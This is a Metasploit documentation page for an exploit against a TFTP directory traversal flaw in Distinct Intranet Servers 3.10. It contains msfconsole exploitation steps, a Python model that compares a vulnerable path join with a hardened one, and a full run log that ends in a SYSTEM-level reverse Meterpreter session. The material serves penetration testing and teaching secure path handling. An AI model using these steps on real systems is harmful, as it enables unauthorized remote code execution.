
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/documentation/modules/exploit/windows/tftp/distinct_tftp_traversal.md

Vulnerable Application

This module exploits a directory traversal vulnerability in the TFTP Server component of Distinct Intranet Servers version 3.10. The server joins the filename supplied in a TFTP write request (WRQ) onto its configured root directory without validating it, so a filename containing ../ sequences lets a remote attacker write arbitrary files anywhere on the server file system; TFTP provides no authentication, so no credentials are needed. The module uses this to drop a payload executable into WINDOWS\system32 and a MOF file into WINDOWS\system32\wbem\mof, which the WMI service compiles and executes, giving code execution in the context of NT AUTHORITY\SYSTEM. This module has been tested successfully on TFTP Server version 3.10 on Windows XP SP3 (EN).

Download:

Verification Steps

Setup:

  1. Install Distinct Intranet Servers

  2. Launch TFTP Server

  3. Select Configure -> TFTP from the application menu

  4. Set the root directory to C:\some\path

  5. Check Enable TFTP Server

  6. Press OK to apply settings

Exploitation:

  1. Start msfconsole

  2. use exploit/windows/tftp/distinct_tftp_traversal

  3. set RHOSTS <rhost>

  4. set DEPTH 10

  5. run

  6. You should receive a session

Options

DEPTH

Number of ../ traversal levels prepended to the destination filename to climb from the TFTP root directory up to the drive root. (Default: 10) A value larger than the real nesting depth of the TFTP root is harmless, because on Windows a .. component at the drive root stays at the drive root, so the default works for any root directory up to ten levels deep.
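The write-request exchange described under Vulnerable Application, together with the effect of the DEPTH option above, as an added example that is not the Metasploit module's code. It builds RFC 1350 WRQ, DATA and ACK packets, frames a payload into 512-byte blocks (the same 145-block split the module output shows for a 73802-byte EXE), and drives the transfer against an in-memory toy server whose path policy is pluggable: a naive root + filename join that the traversal escapes, beside the resolve-then-check form that refuses it. ToyTftpServer, naive_join, safe_join, the root C:\tftproot and the file name payload.exe are hypothetical and only model the behaviour the page describes; they are not Distinct Intranet Servers' code. The ntpath module is used so that Windows path rules apply on any host.

```python
# Added example, not the Metasploit module's code: an RFC 1350 write-request
# exchange run in memory against a toy TFTP server, showing how a DEPTH-style
# "../" filename escapes the configured root and the path check that stops it.
# ToyTftpServer is hypothetical; it models only what the page describes (root +
# client filename joined unchecked) and is not Distinct Intranet Servers code.
import ntpath
import struct

OP_WRQ, OP_DATA, OP_ACK, OP_ERROR = 2, 3, 4, 5
BLOCK_SIZE = 512


def traversal_filename(depth, target):
    r"""Mirror the DEPTH option: depth=10, target=r'\WINDOWS\system32\x.exe'
    yields the destination string shown in the module output."""
    return "../" * depth + target


def build_wrq(filename, mode="octet"):
    # WRQ: | 02 | filename | 0 | mode | 0 |
    return struct.pack("!H", OP_WRQ) + filename.encode() + b"\0" + mode.encode() + b"\0"


def build_data(block, payload):
    # DATA: | 03 | block# | up to 512 bytes |
    return struct.pack("!HH", OP_DATA, block) + payload


def parse_ack(pkt):
    # ACK: | 04 | block# |
    opcode, block = struct.unpack("!HH", pkt[:4])
    if opcode != OP_ACK:
        raise ValueError("expected ACK, got opcode %d" % opcode)
    return block


def split_blocks(data):
    """512-byte framing: a short final block ends the transfer, so a size that
    is an exact multiple of 512 needs a trailing empty block (73802 -> 145)."""
    blocks = [data[i:i + BLOCK_SIZE] for i in range(0, len(data), BLOCK_SIZE)]
    if not blocks or len(blocks[-1]) == BLOCK_SIZE:
        blocks.append(b"")
    return blocks


def naive_join(root, filename):
    """Vulnerable pattern: trust the client's filename. ntpath applies Windows
    path rules on any host, so '..' hops climb out of root as on the target."""
    return ntpath.normpath(ntpath.join(root, filename))


def safe_join(root, filename):
    """Hardened form: resolve first, then require the result to stay under root."""
    root = ntpath.normpath(root)
    target = ntpath.normpath(ntpath.join(root, filename))
    try:
        inside = ntpath.commonpath([root, target]) == root
    except ValueError:  # different drive letters, or UNC vs drive path
        inside = False
    if not inside or target == root:
        raise PermissionError("WRQ filename escapes TFTP root: %r" % filename)
    return target


class ToyTftpServer:
    """Server side of the exchange; join is the path policy under test."""

    def __init__(self, root, join):
        self.root, self.join, self.files, self.dest = root, join, {}, None

    def handle(self, pkt):
        opcode = struct.unpack("!H", pkt[:2])[0]
        if opcode == OP_WRQ:
            filename = pkt[2:].split(b"\0")[0].decode()
            try:
                self.dest = self.join(self.root, filename)
            except PermissionError as e:
                return struct.pack("!HH", OP_ERROR, 2) + str(e).encode() + b"\0"
            self.files[self.dest] = b""
            return struct.pack("!HH", OP_ACK, 0)  # the log's "WRQ accepted"
        if opcode == OP_DATA:
            block = struct.unpack("!H", pkt[2:4])[0]
            self.files[self.dest] += pkt[4:]
            return struct.pack("!HH", OP_ACK, block)
        raise ValueError("unexpected opcode %d" % opcode)


def upload(server, filename, data):
    """Client side: WRQ, then DATA/ACK in lock step. Returns the path the
    server wrote, or None if it refused the WRQ with an ERROR packet."""
    reply = server.handle(build_wrq(filename))
    if struct.unpack("!H", reply[:2])[0] == OP_ERROR:
        return None
    if parse_ack(reply) != 0:
        raise RuntimeError("WRQ not acknowledged with block 0")
    for n, chunk in enumerate(split_blocks(data), start=1):
        if parse_ack(server.handle(build_data(n, chunk))) != n:
            raise RuntimeError("ACK mismatch at block %d" % n)
    return server.dest


if __name__ == "__main__":
    evil = traversal_filename(10, r"\WINDOWS\system32\payload.exe")
    blob = bytes(73802)  # constructed: same length as the EXE in the log
    print("naive:", upload(ToyTftpServer(r"C:\tftproot", naive_join), evil, blob))
    print("safe: ", upload(ToyTftpServer(r"C:\tftproot", safe_join), evil, blob))
```

Run stand-alone, the naive server reports the file landing at C:\WINDOWS\system32\payload.exe while the hardened server returns None after answering the WRQ with an ERROR packet. The check in safe_join normalises before comparing, which is what defeats both ../ hops and a filename that starts with a backslash (ntpath.join treats that as rooted and discards the TFTP root entirely); a prefix check on the raw string would miss the second case.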

Scenarios

Microsoft Windows XP SP3 (EN)

```
msf5 > use exploit/windows/tftp/distinct_tftp_traversal
msf5 exploit(windows/tftp/distinct_tftp_traversal) > set rhosts 172.16.191.205
rhosts => 172.16.191.205
msf5 exploit(windows/tftp/distinct_tftp_traversal) > run

[*] Started reverse TCP handler on 172.16.191.165:4444
[*] Sending EXE (73802 bytes)
[*] Started TFTP client listener on 0.0.0.0:6867
[*] Listening for incoming ACKs
[*] WRQ accepted, sending the file.
[*] Source file: (Data), destination file: ../../../../../../../../../../\WINDOWS\system32\kRzdfnrUu.exe
[*] Sending 73802 bytes (145 blocks)
[*] Sent 512 bytes in block 1
[*] Sent 512 bytes in block 2
[*] Sent 512 bytes in block 3
[*] Sent 512 bytes in block 4
[*] Sent 512 bytes in block 5
[*] Sent 512 bytes in block 6
[*] Sent 512 bytes in block 7
[*] Sent 512 bytes in block 8
[*] Sent 512 bytes in block 9
[*] Sent 512 bytes in block 10
[*] Sent 512 bytes in block 11
[*] Sent 512 bytes in block 12
[*] Sent 512 bytes in block 13
[*] Sent 512 bytes in block 14
[*] Sent 512 bytes in block 15
[*] Sent 512 bytes in block 16
[*] Sent 512 bytes in block 17
[*] Sent 512 bytes in block 18
[*] Sent 512 bytes in block 19
[*] Sent 512 bytes in block 20
[*] Sent 512 bytes in block 21
[*] Sent 512 bytes in block 22
[*] Sent 512 bytes in block 23
[*] Sent 512 bytes in block 24
[*] Sent 512 bytes in block 25
[*] Sent 512 bytes in block 26
[*] Sent 512 bytes in block 27
[*] Sent 512 bytes in block 28
[*] Sent 512 bytes in block 29
[*] Sent 512 bytes in block 30
[*] Sent 512 bytes in block 31
[*] Sent 512 bytes in block 32
[*] Sent 512 bytes in block 33
[*] Sent 512 bytes in block 34
[*] Sent 512 bytes in block 35
[*] Sent 512 bytes in block 36
[*] Sent 512 bytes in block 37
[*] Sent 512 bytes in block 38
[*] Sent 512 bytes in block 39
[*] Sent 512 bytes in block 40
[*] Sent 512 bytes in block 41
[*] Sent 512 bytes in block 42
[*] Sent 512 bytes in block 43
[*] Sent 512 bytes in block 44
[*] Sent 512 bytes in block 45
[*] Sent 512 bytes in block 46
[*] Sent 512 bytes in block 47
[*] Sent 512 bytes in block 48
[*] Sent 512 bytes in block 49
[*] Sent 512 bytes in block 50
[*] Sent 512 bytes in block 51
[*] Sent 512 bytes in block 52
[*] Sent 512 bytes in block 53
[*] Sent 512 bytes in block 54
[*] Sent 512 bytes in block 55
[*] Sent 512 bytes in block 56
[*] Sent 512 bytes in block 57
[*] Sent 512 bytes in block 58
[*] Sent 512 bytes in block 59
[*] Sent 512 bytes in block 60
[*] Sent 512 bytes in block 61
[*] Sent 512 bytes in block 62
[*] Sent 512 bytes in block 63
[*] Sent 512 bytes in block 64
[*] Sent 512 bytes in block 65
[*] Sent 512 bytes in block 66
[*] Sent 512 bytes in block 67
[*] Sent 512 bytes in block 68
[*] Sent 512 bytes in block 69
[*] Sent 512 bytes in block 70
[*] Sent 512 bytes in block 71
[*] Sent 512 bytes in block 72
[*] Sent 512 bytes in block 73
[*] Sent 512 bytes in block 74
[*] Sent 512 bytes in block 75
[*] Sent 512 bytes in block 76
[*] Sent 512 bytes in block 77
[*] Sent 512 bytes in block 78
[*] Sent 512 bytes in block 79
[*] Sent 512 bytes in block 80
[*] Sent 512 bytes in block 81
[*] Sent 512 bytes in block 82
[*] Sent 512 bytes in block 83
[*] Sent 512 bytes in block 84
[*] Sent 512 bytes in block 85
[*] Sent 512 bytes in block 86
[*] Sent 512 bytes in block 87
[*] Sent 512 bytes in block 88
[*] Sent 512 bytes in block 89
[*] Sent 512 bytes in block 90
[*] Sent 512 bytes in block 91
[*] Sent 512 bytes in block 92
[*] Sent 512 bytes in block 93
[*] Sent 512 bytes in block 94
[*] Sent 512 bytes in block 95
[*] Sent 512 bytes in block 96
[*] Sent 512 bytes in block 97
[*] Sent 512 bytes in block 98
[*] Sent 512 bytes in block 99
[*] Sent 512 bytes in block 100
[*] Sent 512 bytes in block 101
[*] Sent 512 bytes in block 102
[*] Sent 512 bytes in block 103
[*] Sent 512 bytes in block 104
[*] Sent 512 bytes in block 105
[*] Sent 512 bytes in block 106
[*] Sent 512 bytes in block 107
[*] Sent 512 bytes in block 108
[*] Sent 512 bytes in block 109
[*] Sent 512 bytes in block 110
[*] Sent 512 bytes in block 111
[*] Sent 512 bytes in block 112
[*] Sent 512 bytes in block 113
[*] Sent 512 bytes in block 114
[*] Sent 512 bytes in block 115
[*] Sent 512 bytes in block 116
[*] Sent 512 bytes in block 117
[*] Sent 512 bytes in block 118
[*] Sent 512 bytes in block 119
[*] Sent 512 bytes in block 120
[*] Sent 512 bytes in block 121
[*] Sent 512 bytes in block 122
[*] Sent 512 bytes in block 123
[*] Sent 512 bytes in block 124
[*] Sent 512 bytes in block 125
[*] Sent 512 bytes in block 126
[*] Sent 512 bytes in block 127
[*] Sent 512 bytes in block 128
[*] Sent 512 bytes in block 129
[*] Sent 512 bytes in block 130
[*] Sent 512 bytes in block 131
[*] Sent 512 bytes in block 132
[*] Sent 512 bytes in block 133
[*] Sent 512 bytes in block 134
[*] Sent 512 bytes in block 135
[*] Sent 512 bytes in block 136
[*] Sent 512 bytes in block 137
[*] Sent 512 bytes in block 138
[*] Sent 512 bytes in block 139
[*] Sent 512 bytes in block 140
[*] Sent 512 bytes in block 141
[*] Sent 512 bytes in block 142
[*] Sent 512 bytes in block 143
[*] Sent 512 bytes in block 144
[*] Sent 74 bytes in block 145
[*] Transferred 73802 bytes in 145 blocks, upload complete!
[*] Sending MOF (2221 bytes)
[*] Started TFTP client listener on 0.0.0.0:59069
[*] Listening for incoming ACKs
[*] WRQ accepted, sending the file.
[*] Source file: (Data), destination file: ../../../../../../../../../../\WINDOWS\system32\wbem\mof\OEEXjgTIL.mof
[*] Sending 2221 bytes (5 blocks)
[*] Sent 512 bytes in block 1
[*] Sent 512 bytes in block 2
[*] Sent 512 bytes in block 3
[*] Sent 512 bytes in block 4
[*] Sent 173 bytes in block 5
[*] Transferred 2221 bytes in 5 blocks, upload complete!
[*] Sending stage (176195 bytes) to 172.16.191.205
[*] Meterpreter session 1 opened (172.16.191.165:4444 -> 172.16.191.205:1247) at 2020-05-14 00:43:03 -0400
[!] This exploit may require manual cleanup of 'kRzdfnrUu.exe' on the target
[!] This exploit may require manual cleanup of 'wbem\mof\good\OEEXjgTIL.mof' on the target

meterpreter > [+] Deleted wbem\mof\good\OEEXjgTIL.mof

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >
```